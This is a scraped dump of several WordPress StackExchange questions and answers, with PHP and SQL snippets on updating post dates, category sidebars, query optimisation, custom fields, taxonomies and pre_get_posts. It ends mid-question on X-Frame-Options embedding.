"text": "<pre><code><?php\n\n\n$servername = "localhost";\n$username = "user";\n$password = "pass";\n$dbname = "db";\n\n// Create connection\n$conn = new mysqli($servername, $username, $password, $dbname);\n// Check connection\nif ($conn->connect_error) {\n die("Connection failed: " . $conn->connect_error);\n}\n\n$sql = "UPDATE zulu_posts SET post_modified_gmt = '2020-11-17-04:00:00'";\n$sql = "UPDATE zulu_posts SET post_modified = '2020-11-17-04:00:00'";\n\nif ($conn->query($sql) === TRUE) {\n echo "Record updated successfully";\n} else {\n echo "Error updating record: " . $conn->error;\n}\n\n$conn->close();\n?>\n</code></pre>\n<p>Ok bro this one worked, but i could like to add a form where by i can input the date and time i want and submit.\nPlease any idea on how i can do it</p>\n"
}
] | 2020/11/17 | [
"https://wordpress.stackexchange.com/questions/378343",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/192453/"
] | I'm trying to replace the "thumb-w" CSS class with "thumb-w1", just the first time.
This is the starting function:
```
function start_modify_html() {
ob_start();
}
function end_modify_html() {
$html = ob_get_clean();
$html = str_replace( 'thumb-w', 'thumb-w 1', $html);
echo $html;
}
add_action( 'wp_head', 'start_modify_html' );
add_action( 'wp_footer', 'end_modify_html' );
```
I tried entering "1" in the str\_replace in this way:
```
$html = str_replace( 'thumb-w', 'thumb-w 1', $html);
```
but it doesn't seem to work.
Can you help me?
Thanks | You can use a generalized update query. As always, when dealing with databases **take a backup first**.
With that out of the way, your query should look something like:
```sql
BEGIN; -- Start a transaction
UPDATE
wp_posts
SET
post_modified = <Your new date>
AND post_modified_gmt = <Your new date in GMT>;
SELECT * FROM wp_posts LIMIT 10 ORDER BY post_date DESC; -- See the 10 most recently authored posts, make sure their post_modified and post_modified_gmt looks good
COMMIT; -- Commit the changes to the database or
ROLLBACK; -- If things don't look right.
```
**Edit**: in your case, if you do this in PHP, **definitely** take a backup, and then make `$sql` everything above except for the lines with `BEGIN`, `COMMIT`, and `ROLLBACK`, though I'd recommend doing this in the command line or a GUI/web interface. |
378,352 | <p>I have a site with many product categories and subcategories. I need to show the same sidebar as the primary category in the subcategories as well.</p>
<p>Example:</p>
<p>Wine (sidebar 1)
White Wine (sidebar 1)
Red Wine (sidebar 1)
...and many others</p>
<p>Distillates (sidebar 2)
Whisky (sidebar 2)
Brandy (sidebar 2)
...and many others</p>
<p>So I need a system that is as automatic as possible.</p>
<pre><code>if ( is_product_category( 'wine' ) ) {
dynamic_sidebar('Wine Sidebar');
}
elseif ( is_product_category( 'distillates' ) ) {
dynamic_sidebar('Distillates Sidebar');
}
</code></pre>
<p>This code is only for primary categories.</p>
| [
{
"answer_id": 378360,
"author": "Tony Djukic",
"author_id": 60844,
"author_profile": "https://wordpress.stackexchange.com/users/60844",
"pm_score": 0,
"selected": false,
"text": "<p>Not sure how you're going to be calling these categories as you could do it programmatically using <code>'child_of'=>$parentCatID</code> but you'd need to check the WooCommerce documentation to see exactly how.</p>\n<p>To answer your question, <code>is_product_category()</code> will accept an array of categories, so the following should work:</p>\n<pre><code>if( is_product_category( array( 'wine', 'white-wine', 'red-wine' ) ) ) :\n dynamic_sidebar( 'Wine Sidebar' );\nelseif( is_product_category( array( 'distillates', 'whiskey', 'brandy' ) ) ) :\n dynamic_sidebar( 'Distillates Sidebar' );\nendif;\n</code></pre>\n<p>Hope that helps and welcome to WordPress.StackExchange. :-)</p>\n"
},
{
"answer_id": 378392,
"author": "AndreaLB",
"author_id": 197727,
"author_profile": "https://wordpress.stackexchange.com/users/197727",
"pm_score": 1,
"selected": false,
"text": "<pre><code>$currentCat = get_queried_object();\nif ( $currentCat->term_id == 64 || $currentCat->parent == 64 ) { \ndynamic_sidebar('Distillati Sidebar');\n}\n</code></pre>\n<p>I solved in this way: it works!</p>\n"
}
] | 2020/11/18 | [
"https://wordpress.stackexchange.com/questions/378352",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/197709/"
] | I have a site with many product categories and subcategories. I need to show the same sidebar as the primary category in the subcategories as well.
Example:
Wine (sidebar 1)
White Wine (sidebar 1)
Red Wine (sidebar 1)
...and many others
Distillates (sidebar 2)
Whisky (sidebar 2)
Brandy (sidebar 2)
...and many others
So I need a system that is as automatic as possible.
```
if ( is_product_category( 'wine' ) ) {
dynamic_sidebar('Wine Sidebar');
}
elseif ( is_product_category( 'distillates' ) ) {
dynamic_sidebar('Distillates Sidebar');
}
```
This code is only for primary categories. | ```
$currentCat = get_queried_object();
if ( $currentCat->term_id == 64 || $currentCat->parent == 64 ) {
dynamic_sidebar('Distillati Sidebar');
}
```
I solved in this way: it works! |
378,552 | <p>I have a wordpress page template, where I'm loading custom posts.</p>
<p>The code for fetching these custom posts looks as follows:</p>
<p><strong>template-parts/content-page.php</strong></p>
<pre><code><article id="songs">
<?php get_template_part( 'partials/content/custom', 'songs' ); ?>
</article>
</code></pre>
<p><strong>partials/content/custom/songs.php</strong></p>
<pre><code>$args = array(
'posts_per_page' => 0,
'offset' => 0,
'category' => '',
'category_name' => '',
'orderby' => $orderBy,
'order' => $order,
'include' => '',
'meta_key' => '',
'meta_value' => '',
'post_type' => 'custom_song',
'post_mime_type' => '',
'post_parent' => '',
'author' => '',
'post_status' => 'publish',
'suppress_filters' => true
);
$songs_array = get_posts( $args );
if (count($songs_array) > 0){
?>
<ul>
<?php
foreach ($songs_array as $mysong){
set_query_var( 'mysong', $mysong);
get_template_part( 'partials/content/custom', 'normal' );
}
?>
</ul>
<?php
}
?>
</code></pre>
<p>The problem is that there are over 2000 records. And I want all of them to be loaded at once without any pagination. The above code works and it does load all the posts, but the page is slow because of this query.</p>
<p>Can you please help me how I can optimize this and make the load faster? Is there a way I can load this asynchronously? So that I can show a loading icon in this part of the page till the posts are loaded?</p>
| [
{
"answer_id": 378564,
"author": "Veerji",
"author_id": 197182,
"author_profile": "https://wordpress.stackexchange.com/users/197182",
"pm_score": 1,
"selected": false,
"text": "<p>In your case you can use ajax on page scroll ( Infinite Scroll ) to load more post. On first page load it will load only few ( 20 for example ) post, and when user scroll to bottom and scroll reach to bottom ajax will load more ( 20 ) post. In this way you can asynchronously load post with loading icon.</p>\n<p>For infinite scroll there are many plugin are availabe if you want to use.\nOr you can use own custom code for this, following are links which impliemtns custom infinite scroll, Hope it will help.</p>\n<ol>\n<li><a href=\"https://dev.to/erhankilic/adding-infinite-scroll-without-plugin-to-wordpress-theme-595a\" rel=\"nofollow noreferrer\">https://dev.to/erhankilic/adding-infinite-scroll-without-plugin-to-wordpress-theme-595a</a></li>\n<li><a href=\"https://scripthere.com/simple-infinite-scroll-for-wordpress-sites-without-plugin/\" rel=\"nofollow noreferrer\">https://scripthere.com/simple-infinite-scroll-for-wordpress-sites-without-plugin/</a></li>\n</ol>\n"
},
{
"answer_id": 378687,
"author": "Bysander",
"author_id": 47618,
"author_profile": "https://wordpress.stackexchange.com/users/47618",
"pm_score": 2,
"selected": false,
"text": "<p>Regardless if you are loading through AJAX or not, if you need to load 2000+ records on one page, at one single time or in one single request you are always going to be at the mercy of your server resources to do so.</p>\n<p>I would look at caching solutions first as that will be the simplest to set up quickly - then in the meantime query optimisation will be where you save time. Only getting the bare essential data you need to display will help a great deal. For example if you are only showing a link then only lookup the Title & Permalink. This could be done either via <code>WP_Query</code> and the <code>fields</code> parameter <a href=\"https://wordpress.stackexchange.com/a/166034/47618\">here</a> - or a custom MySQL query.</p>\n<p>If you want to go down the AJAX route then you will need to make sure that your script only outputs useful data - the <em>partials/content/custom/songs.php</em> template could have it's own url endpoint and you can then call it on page using jQuery - AJAX load() Method. Don't load the whole page and it's associated stylesheets and JS scripts and other resources - headers footers etc and then pick out the relevant DIV to load. Make that page a bare html page with just the data you need.</p>\n<p>I seem to also remember something called "chunking" that Nginx or Apache does (can't remember which). I since can't find much info on it either. From memory this returns part of the page to the end user before the end of script has finished loading. This could be worth looking at - if you want the user to see 'something' before the full page is processed / loaded.</p>\n<p>Finally - education - tell the client that if your server is slow when you have only 2000 records and they hope to grow their song catalogue you're heading in one direction. To an expensive server / CPU bill. It's usually cheaper to pay a developer to fix / optimise something once vs. paying monthly for higher usage and bigger server bills every month for 2+ years. If you get them to understand this one though please teach me how...</p>\n<p>AJAX lazy loading via query pagination is the sensible approach here you could even trigger the 1st lazy load on completion of the 1st page load and put the scroll offset trigger high up - you would probably never see the end of the list before the next bit is loaded....</p>\n<p>Sorry - lot of text and not much code today... but be thankful at least. This started as a comment and no one wants to read a comment that long</p>\n"
},
{
"answer_id": 378721,
"author": "cjbj",
"author_id": 75495,
"author_profile": "https://wordpress.stackexchange.com/users/75495",
"pm_score": 2,
"selected": false,
"text": "<p>Testing is the only way to be sure, but my guess would be that it is not the query itself that is slowing the page load. After you have fetched those 2000 records, you are looping through them. Every time you call <a href=\"https://developer.wordpress.org/reference/functions/get_template_part/\" rel=\"nofollow noreferrer\"><code>get_template_part</code></a>. This function in turn calls <a href=\"https://developer.wordpress.org/reference/functions/locate_template/\" rel=\"nofollow noreferrer\"><code>locate_template</code></a>, which leads to <a href=\"https://developer.wordpress.org/reference/functions/load_template/\" rel=\"nofollow noreferrer\"><code>load_template</code></a>, where you find the <code>require</code> function that actually loads the template file. There probably is some caching going on, but in theory you are doing 2000 file load requests.</p>\n<p>So, I would get rid of that separate template file and integrate it in the loop. It will at least save you several function calls.</p>\n"
},
{
"answer_id": 378740,
"author": "KodimWeb",
"author_id": 198003,
"author_profile": "https://wordpress.stackexchange.com/users/198003",
"pm_score": 1,
"selected": false,
"text": "<p>A good practice would be to use cron(since it runs in the background <a href=\"https://github.com/deliciousbrains/wp-background-processing\" rel=\"nofollow noreferrer\">https://github.com/deliciousbrains/wp-background-processing</a>) to generate a heavy request (if the request is very heavy, you can add more queues). The bottom line is that cron generates an array of data and stores it in" transient " (you can use the entire layout), and then at the right time you can get this data with a light query to the database.</p>\n"
}
] | 2020/11/21 | [
"https://wordpress.stackexchange.com/questions/378552",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/197865/"
] | I have a wordpress page template, where I'm loading custom posts.
The code for fetching these custom posts looks as follows:
**template-parts/content-page.php**
```
<article id="songs">
<?php get_template_part( 'partials/content/custom', 'songs' ); ?>
</article>
```
**partials/content/custom/songs.php**
```
$args = array(
'posts_per_page' => 0,
'offset' => 0,
'category' => '',
'category_name' => '',
'orderby' => $orderBy,
'order' => $order,
'include' => '',
'meta_key' => '',
'meta_value' => '',
'post_type' => 'custom_song',
'post_mime_type' => '',
'post_parent' => '',
'author' => '',
'post_status' => 'publish',
'suppress_filters' => true
);
$songs_array = get_posts( $args );
if (count($songs_array) > 0){
?>
<ul>
<?php
foreach ($songs_array as $mysong){
set_query_var( 'mysong', $mysong);
get_template_part( 'partials/content/custom', 'normal' );
}
?>
</ul>
<?php
}
?>
```
The problem is that there are over 2000 records. And I want all of them to be loaded at once without any pagination. The above code works and it does load all the posts, but the page is slow because of this query.
Can you please help me how I can optimize this and make the load faster? Is there a way I can load this asynchronously? So that I can show a loading icon in this part of the page till the posts are loaded? | Regardless if you are loading through AJAX or not, if you need to load 2000+ records on one page, at one single time or in one single request you are always going to be at the mercy of your server resources to do so.
I would look at caching solutions first as that will be the simplest to set up quickly - then in the meantime query optimisation will be where you save time. Only getting the bare essential data you need to display will help a great deal. For example if you are only showing a link then only lookup the Title & Permalink. This could be done either via `WP_Query` and the `fields` parameter [here](https://wordpress.stackexchange.com/a/166034/47618) - or a custom MySQL query.
If you want to go down the AJAX route then you will need to make sure that your script only outputs useful data - the *partials/content/custom/songs.php* template could have it's own url endpoint and you can then call it on page using jQuery - AJAX load() Method. Don't load the whole page and it's associated stylesheets and JS scripts and other resources - headers footers etc and then pick out the relevant DIV to load. Make that page a bare html page with just the data you need.
I seem to also remember something called "chunking" that Nginx or Apache does (can't remember which). I since can't find much info on it either. From memory this returns part of the page to the end user before the end of script has finished loading. This could be worth looking at - if you want the user to see 'something' before the full page is processed / loaded.
Finally - education - tell the client that if your server is slow when you have only 2000 records and they hope to grow their song catalogue you're heading in one direction. To an expensive server / CPU bill. It's usually cheaper to pay a developer to fix / optimise something once vs. paying monthly for higher usage and bigger server bills every month for 2+ years. If you get them to understand this one though please teach me how...
AJAX lazy loading via query pagination is the sensible approach here you could even trigger the 1st lazy load on completion of the 1st page load and put the scroll offset trigger high up - you would probably never see the end of the list before the next bit is loaded....
Sorry - lot of text and not much code today... but be thankful at least. This started as a comment and no one wants to read a comment that long |
378,672 | <p>I want to create some custom fields that will be able to show to a default wordpress post. I don't want to use the ACF plugin.
Is there anyway to do it programmatically?</p>
<p>Thanks</p>
| [
{
"answer_id": 378676,
"author": "Marcus Hohlbein",
"author_id": 197957,
"author_profile": "https://wordpress.stackexchange.com/users/197957",
"pm_score": 2,
"selected": false,
"text": "<p>You can use the custom fields included in wordpress</p>\n<p>Add a new post and do the following steps:</p>\n<p><strong>1. Go to the Options page</strong></p>\n<p><a href=\"https://i.stack.imgur.com/nqsqA.png\" rel=\"nofollow noreferrer\"><img src=\"https://i.stack.imgur.com/nqsqA.png\" alt=\"select options page\" /></a></p>\n<p><strong>2. Select "custom fields" and hit the reload button</strong></p>\n<p><a href=\"https://i.stack.imgur.com/j7UOw.png\" rel=\"nofollow noreferrer\"><img src=\"https://i.stack.imgur.com/j7UOw.png\" alt=\"select the custom field option and reload\" /></a></p>\n<p><strong>3. you now have a custom field in your post edit page at the bottom.</strong></p>\n<p><a href=\"https://i.stack.imgur.com/PZOxD.png\" rel=\"nofollow noreferrer\"><img src=\"https://i.stack.imgur.com/PZOxD.png\" alt=\"custom field\" /></a></p>\n<p>now you can use this custom field in your theme inside the <code>post-loop</code></p>\n<pre><code><?php while ( have_posts() ) : the post(); ?>\n\n <?php echo get_post_meta($post->ID, 'featured', true); ?>\n\n<?php endwhile; ?>\n</code></pre>\n<p>You have to replace 'featured' with the name of your custom field.</p>\n<p>Once you created a custom field, you can use it in your others post as well.</p>\n<p>Hope this is helpful.</p>\n"
},
{
"answer_id": 378680,
"author": "nickfindley",
"author_id": 134336,
"author_profile": "https://wordpress.stackexchange.com/users/134336",
"pm_score": 0,
"selected": false,
"text": "<p>This article walks you through creating a very basic, lightweight plugin to add your own meta fields. I'm sure it could be adapted to be used as a standalone function rather than a plugin.</p>\n<p><a href=\"https://metabox.io/how-to-create-custom-meta-boxes-custom-fields-in-wordpress/\" rel=\"nofollow noreferrer\">https://metabox.io/how-to-create-custom-meta-boxes-custom-fields-in-wordpress/</a></p>\n<p>Essentially you add your fields using <code>add_meta_box()</code> and setting the post type to <code>post</code> or whatever CPT you like. Update the fields using <code>update_post_meta()</code>. Then display wherever you like using <code>get_post_meta()</code>.</p>\n<p><a href=\"https://developer.wordpress.org/reference/functions/add_meta_box/\" rel=\"nofollow noreferrer\">add_meta_box</a></p>\n<p><a href=\"https://developer.wordpress.org/reference/functions/update_post_meta/\" rel=\"nofollow noreferrer\">update_post_meta</a></p>\n<p><a href=\"https://developer.wordpress.org/reference/functions/get_post_meta/\" rel=\"nofollow noreferrer\">get_post_meta</a></p>\n"
}
] | 2020/11/23 | [
"https://wordpress.stackexchange.com/questions/378672",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/197094/"
] | I want to create some custom fields that will be able to show to a default wordpress post. I don't want to use the ACF plugin.
Is there anyway to do it programmatically?
Thanks | You can use the custom fields included in wordpress
Add a new post and do the following steps:
**1. Go to the Options page**
[](https://i.stack.imgur.com/nqsqA.png)
**2. Select "custom fields" and hit the reload button**
[](https://i.stack.imgur.com/j7UOw.png)
**3. you now have a custom field in your post edit page at the bottom.**
[](https://i.stack.imgur.com/PZOxD.png)
now you can use this custom field in your theme inside the `post-loop`
```
<?php while ( have_posts() ) : the post(); ?>
<?php echo get_post_meta($post->ID, 'featured', true); ?>
<?php endwhile; ?>
```
You have to replace 'featured' with the name of your custom field.
Once you created a custom field, you can use it in your others post as well.
Hope this is helpful. |
378,725 | <p>In the built category, we can use <code>has_category()</code> and <code>the_category()</code> to show if the post has category and the name of the category.</p>
<p>Now, I am using my custom post type and custom taxonomy. The above two functions are invalid in this case. I wonder what's the API to use here? Thank you.</p>
| [
{
"answer_id": 378728,
"author": "Tiyo",
"author_id": 197579,
"author_profile": "https://wordpress.stackexchange.com/users/197579",
"pm_score": 1,
"selected": false,
"text": "<p>Usually I used <code>has_term()</code> and <code>the_terms()</code>.</p>\n<p>These are the examples</p>\n<pre><code>if( has_term('', 'genre') ){\n // do something\n}\n</code></pre>\n<pre><code>the_terms( $post->ID, 'category', 'categories: ', ' / ' );\n</code></pre>\n<p>OR, I used this to get a list <code>get_the_term_list()</code></p>\n<p>for example</p>\n<pre><code>echo get_the_term_list($post->ID, 'category', '', ', ');\n</code></pre>\n"
},
{
"answer_id": 378730,
"author": "Shark Deng",
"author_id": 193939,
"author_profile": "https://wordpress.stackexchange.com/users/193939",
"pm_score": 0,
"selected": false,
"text": "<p>I found this working method, in case you are interested.</p>\n<pre><code>if ( true === $show_categories && has_category() ) {\n ?>\n\n <div class="entry-categories">\n <span class="screen-reader-text"><?php _e( 'Categories', 'twentytwenty' ); ?></span>\n <div class="entry-categories-inner">\n <?php the_category( ' ' ); ?>\n </div><!-- .entry-categories-inner -->\n </div><!-- .entry-categories -->\n\n <?php\n \n // custom post type\n } else {\n $post_type = get_post_type(); \n $category = $post_type . '_cat';\n $taxonomy_names = wp_get_object_terms(get_the_ID(), $category);\n \n if (true === $show_categories && !empty($taxonomy_names) ) {\n $term = array_pop($taxonomy_names);\n ?>\n <div>\n <span><?php _e( 'Categories:', 'twentytwenty' ); ?></span>\n <a href="<?php echo get_term_link( $term->slug, $category ); ?> "> <?php echo $term->name; ?> </a>\n </div><!-- .entry-categories -->\n <?php\n }\n \n }\n</code></pre>\n<p>And this is the <a href=\"https://www.jobyme88.com/?st_ai=get_object_taxonomies\" rel=\"nofollow noreferrer\">example link</a>, if you want to see the result.</p>\n"
}
] | 2020/11/24 | [
"https://wordpress.stackexchange.com/questions/378725",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/193939/"
] | In the built category, we can use `has_category()` and `the_category()` to show if the post has category and the name of the category.
Now, I am using my custom post type and custom taxonomy. The above two functions are invalid in this case. I wonder what's the API to use here? Thank you. | Usually I used `has_term()` and `the_terms()`.
These are the examples
```
if( has_term('', 'genre') ){
// do something
}
```
```
the_terms( $post->ID, 'category', 'categories: ', ' / ' );
```
OR, I used this to get a list `get_the_term_list()`
for example
```
echo get_the_term_list($post->ID, 'category', '', ', ');
``` |
378,791 | <p>I'm using <code>pre_get_posts</code> and looking for a way to exclude posts in the main query. I'm using <code>query_vars</code> to query posts from a specific category and looking for a solution to exclude those posts in the main query.</p>
<p>My code:</p>
<pre><code>// function to setup query_vars
function ctrl_dly_podcast( $query_vars ){
$query_vars[] = 'ctrl_podcasts_status';
return $query_vars;
}
add_filter( 'query_vars', 'ctrl_dly_podcast' );
function index_first_post( $query_vars ){
$query_vars[] = 'index_first_post';
return $query_vars;
}
add_filter( 'query_vars', 'index_first_post' );
function first_video( $query_vars ){
$query_vars[] = '1st_video';
return $query_vars;
}
add_filter( 'query_vars', 'first_video' );
function rest_posts( $query_vars ){
$query_vars[] = 'posts_the_rest';
return $query_vars;
}
add_filter( 'query_vars', 'rest_posts' );
//the pre_get_posts function
function opby_query( $query ) {
if( isset( $query->query_vars['ctrl_podcasts_status'] )) {
$query->set('tax_query', array(array('taxonomy' => 'category','field' => 'slug','terms' => array( 'podcast-control-daily' ),'operator'=> 'IN')));
$query->set('posts_per_page', 1);
}
if( isset( $query->query_vars['index_first_post'] )) {
$query->set('tax_query', array(array('taxonomy' => 'category','field' => 'slug','terms' => array( 'podcast-control-daily' ),'operator'=> 'NOT IN'),array('taxonomy' => 'post_format','field' => 'slug','terms' => array( 'video' ),'operator'=> 'NOT IN')));
$query->set('posts_per_page', 1);
}
if( isset( $query->query_vars['1st_video'] )) {
$query->set('tax_query', array(array('taxonomy' => 'category','field' => 'slug','terms' => array( 'video' ),'operator'=> 'IN')));
$query->set('posts_per_page', 1);
};
// the part I'm having problems with
if( isset( $query->query_vars['posts_the_rest'] )) {
$query->set('offset', array($query->query_vars['1st_video'],$query->query_vars['index_first_post'],$query->query_vars['ctrl_podcasts_status']);
$query->set('posts_per_page', 15);
}
return $query;
}
add_action( 'pre_get_posts', 'opby_query' );
</code></pre>
| [
{
"answer_id": 378794,
"author": "Hims V",
"author_id": 170356,
"author_profile": "https://wordpress.stackexchange.com/users/170356",
"pm_score": 0,
"selected": false,
"text": "<p>Did you try with this one?</p>\n<pre><code>$query->set( 'post__not_in', array( 1, 1 ) );\n</code></pre>\n<p>In the array( 1, 1 ) is array( $PostID, $PostID ) which post ids you want to exclude from main query.</p>\n"
},
{
"answer_id": 378799,
"author": "Ivan Shatsky",
"author_id": 124579,
"author_profile": "https://wordpress.stackexchange.com/users/124579",
"pm_score": 1,
"selected": false,
"text": "<p>What about this one?</p>\n<pre class=\"lang-php prettyprint-override\"><code>function opby_query( $query ) {\n\n if ( $query->is_main_query() ) {\n if ( $query->is_home() ) {\n $query->set('posts_per_page', 15);\n };\n if ( isset( $query->query_vars['ctrl_podcasts_status'] ) ) {\n // get main query args\n $subquery_args = $query->query_vars;\n // add tax_query filter\n $subquery_args['tax_query'] = array( array(\n 'taxonomy' => 'category',\n 'field' => 'slug',\n 'terms' => array( 'podcast-control-daily' ),\n 'operator'=> 'IN'\n ) );\n // get only the first post\n $subquery_args['posts_per_page'] = 1;\n // we need only post IDs\n $subquery_args['fields'] = 'ids';\n // run the subquery\n $exclude_posts = get_posts( $subquery_args );\n if ( is_array( $exclude_posts ) ) {\n $query->set( 'post__not_in', $exclude_posts );\n }\n }\n }\n\n return $query;\n}\n</code></pre>\n"
},
{
"answer_id": 407683,
"author": "Gregory Schultz",
"author_id": 8049,
"author_profile": "https://wordpress.stackexchange.com/users/8049",
"pm_score": 2,
"selected": true,
"text": "<p>This should be better:</p>\n<p>So in <code>pre_get_posts</code>, I've setup a <code>get_posts</code> function to get IDs of posts and then pass them on to <code>post_not_in</code> and <code>offset</code> the first post from the loop.</p>\n<pre><code>function site_alerts( $query_vars ){\n $query_vars[] = 'opby_alerts';\n return $query_vars;\n}\nadd_filter( 'query_vars', 'site_alerts' );\nfunction opby_query( $query ) {\nif ( $query->is_home() && $query->is_main_query() ) {\n $exclude = get_posts( array( 'category_name' => 'candlestick-episode', 'posts_per_page' => 1, 'fields' => 'ids' ) );\n $exclude2 = get_posts( array( 'category_name' => 'video', 'posts_per_page' => 1, 'fields' => 'ids' ) );\n $query->set('posts_per_page', 15);\n $query->set( 'offset', '1' );\n $query->set('post__not_in',array($exclude[0],$exclude2[0])); \n}\nif( isset( $query->query_vars['opby_alerts'] )) {\n $query->set('post_type', array( 'alerts' ) );\n $query->set('meta_query', array('relation' => 'OR',array('key' => 'breaking_news_status','value' => 'active'),array('key' => 'developing_news_status','value' => 'active'),array('key' => 'alert_news_status','value' => 'active'),array('key' => 'notice_news_status','value' => 'active')));\n $query->set('posts_per_page', -1);\n}\nreturn $query;\n}\nadd_action( 'pre_get_posts', 'opby_query' );\n</code></pre>\n<p>And then the posts that are in <code>post_not_in</code> have their own query:</p>\n<pre><code>// first loop to show the first post from the offset\n<?php $args = array('posts_per_page' => '1','tax_query' => array(\narray(\n 'taxonomy' => 'category',\n 'field' => 'slug',\n 'terms' => array('candlestick-episode','candlestick-special','video'),\n 'operator' => 'NOT IN'\n)\n)\n);$query = new WP_query ( $args );\nif ( $query->have_posts() ) { ?>\n<?php while ( $query->have_posts() ) : $query->the_post(); /* start the loop */ ?>\nfirst - <?php the_title(); ?><br>\n<?php // End the loop.\nendwhile;\nrewind_posts();\n} ?>\n\n// first post from a category that's in post__not_in\n<?php $args = array(\n'posts_per_page' => '1','tax_query' => array(\narray(\n 'taxonomy' => 'category',\n 'field' => 'slug',\n 'terms' => array('candlestick-episode','candlestick-special'),\n 'operator' => 'IN'\n)\n)\n);$query = new WP_query ( $args );\nif ( $query->have_posts() ) { ?>\n<?php while ( $query->have_posts() ) : $query->the_post(); /* start the loop */ ?>\npodcast - <?php the_title(); ?><br>\n<?php // End the loop.\nendwhile;\nrewind_posts();\n} ?>\n\n// another post from category from post__not_in\n<?php $args = array(\n'posts_per_page' => '1','tax_query' => array(\narray(\n 'taxonomy' => 'category',\n 'field' => 'slug',\n 'terms' => array('video'),\n 'operator' => 'IN'\n)\n)\n);$query = new WP_query ( $args );\nif ( $query->have_posts() ) { ?>\n<?php while ( $query->have_posts() ) : $query->the_post(); /* start the loop */ ?>\nvideo - <?php the_title(); ?><br>\n<?php // End the loop.\nendwhile;\nrewind_posts();\n} ?>\n\n// the loop from pre_get_posts\n<?php while ( have_posts() ) : the_post();?>\n<?php the_title(); ?><br>\n<?php // End the loop.\nendwhile; ?>\n</code></pre>\n"
}
] | 2020/11/25 | [
"https://wordpress.stackexchange.com/questions/378791",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/8049/"
] | I'm using `pre_get_posts` and looking for a way to exclude posts in the main query. I'm using `query_vars` to query posts from a specific category and looking for a solution to exclude those posts in the main query.
My code:
```
// function to setup query_vars
function ctrl_dly_podcast( $query_vars ){
$query_vars[] = 'ctrl_podcasts_status';
return $query_vars;
}
add_filter( 'query_vars', 'ctrl_dly_podcast' );
function index_first_post( $query_vars ){
$query_vars[] = 'index_first_post';
return $query_vars;
}
add_filter( 'query_vars', 'index_first_post' );
function first_video( $query_vars ){
$query_vars[] = '1st_video';
return $query_vars;
}
add_filter( 'query_vars', 'first_video' );
function rest_posts( $query_vars ){
$query_vars[] = 'posts_the_rest';
return $query_vars;
}
add_filter( 'query_vars', 'rest_posts' );
//the pre_get_posts function
function opby_query( $query ) {
if( isset( $query->query_vars['ctrl_podcasts_status'] )) {
$query->set('tax_query', array(array('taxonomy' => 'category','field' => 'slug','terms' => array( 'podcast-control-daily' ),'operator'=> 'IN')));
$query->set('posts_per_page', 1);
}
if( isset( $query->query_vars['index_first_post'] )) {
$query->set('tax_query', array(array('taxonomy' => 'category','field' => 'slug','terms' => array( 'podcast-control-daily' ),'operator'=> 'NOT IN'),array('taxonomy' => 'post_format','field' => 'slug','terms' => array( 'video' ),'operator'=> 'NOT IN')));
$query->set('posts_per_page', 1);
}
if( isset( $query->query_vars['1st_video'] )) {
$query->set('tax_query', array(array('taxonomy' => 'category','field' => 'slug','terms' => array( 'video' ),'operator'=> 'IN')));
$query->set('posts_per_page', 1);
};
// the part I'm having problems with
if( isset( $query->query_vars['posts_the_rest'] )) {
$query->set('offset', array($query->query_vars['1st_video'],$query->query_vars['index_first_post'],$query->query_vars['ctrl_podcasts_status']);
$query->set('posts_per_page', 15);
}
return $query;
}
add_action( 'pre_get_posts', 'opby_query' );
``` | This should be better:
So in `pre_get_posts`, I've setup a `get_posts` function to get IDs of posts and then pass them on to `post_not_in` and `offset` the first post from the loop.
```
function site_alerts( $query_vars ){
$query_vars[] = 'opby_alerts';
return $query_vars;
}
add_filter( 'query_vars', 'site_alerts' );
function opby_query( $query ) {
if ( $query->is_home() && $query->is_main_query() ) {
$exclude = get_posts( array( 'category_name' => 'candlestick-episode', 'posts_per_page' => 1, 'fields' => 'ids' ) );
$exclude2 = get_posts( array( 'category_name' => 'video', 'posts_per_page' => 1, 'fields' => 'ids' ) );
$query->set('posts_per_page', 15);
$query->set( 'offset', '1' );
$query->set('post__not_in',array($exclude[0],$exclude2[0]));
}
if( isset( $query->query_vars['opby_alerts'] )) {
$query->set('post_type', array( 'alerts' ) );
$query->set('meta_query', array('relation' => 'OR',array('key' => 'breaking_news_status','value' => 'active'),array('key' => 'developing_news_status','value' => 'active'),array('key' => 'alert_news_status','value' => 'active'),array('key' => 'notice_news_status','value' => 'active')));
$query->set('posts_per_page', -1);
}
return $query;
}
add_action( 'pre_get_posts', 'opby_query' );
```
And then the posts that are in `post_not_in` have their own query:
```
// first loop to show the first post from the offset
<?php $args = array('posts_per_page' => '1','tax_query' => array(
array(
'taxonomy' => 'category',
'field' => 'slug',
'terms' => array('candlestick-episode','candlestick-special','video'),
'operator' => 'NOT IN'
)
)
);$query = new WP_query ( $args );
if ( $query->have_posts() ) { ?>
<?php while ( $query->have_posts() ) : $query->the_post(); /* start the loop */ ?>
first - <?php the_title(); ?><br>
<?php // End the loop.
endwhile;
rewind_posts();
} ?>
// first post from a category that's in post__not_in
<?php $args = array(
'posts_per_page' => '1','tax_query' => array(
array(
'taxonomy' => 'category',
'field' => 'slug',
'terms' => array('candlestick-episode','candlestick-special'),
'operator' => 'IN'
)
)
);$query = new WP_query ( $args );
if ( $query->have_posts() ) { ?>
<?php while ( $query->have_posts() ) : $query->the_post(); /* start the loop */ ?>
podcast - <?php the_title(); ?><br>
<?php // End the loop.
endwhile;
rewind_posts();
} ?>
// another post from category from post__not_in
<?php $args = array(
'posts_per_page' => '1','tax_query' => array(
array(
'taxonomy' => 'category',
'field' => 'slug',
'terms' => array('video'),
'operator' => 'IN'
)
)
);$query = new WP_query ( $args );
if ( $query->have_posts() ) { ?>
<?php while ( $query->have_posts() ) : $query->the_post(); /* start the loop */ ?>
video - <?php the_title(); ?><br>
<?php // End the loop.
endwhile;
rewind_posts();
} ?>
// the loop from pre_get_posts
<?php while ( have_posts() ) : the_post();?>
<?php the_title(); ?><br>
<?php // End the loop.
endwhile; ?>
``` |
378,819 | <p>I have a Wordpress site hosted on LightSail (which uses bitnami). The domain is <code>https://example.com</code>
On a subdomain <code>https://sub.example.com</code> I have another server running. On this server, I want to embed a page from the main domain <code>https://example.com/a-page</code>. Currently, I am getting errors that permission is denied.</p>
<p>I have updated the htaccess file like so:</p>
<pre><code>Header set X-Frame-Options "ALLOW-FROM https://*.example.com"
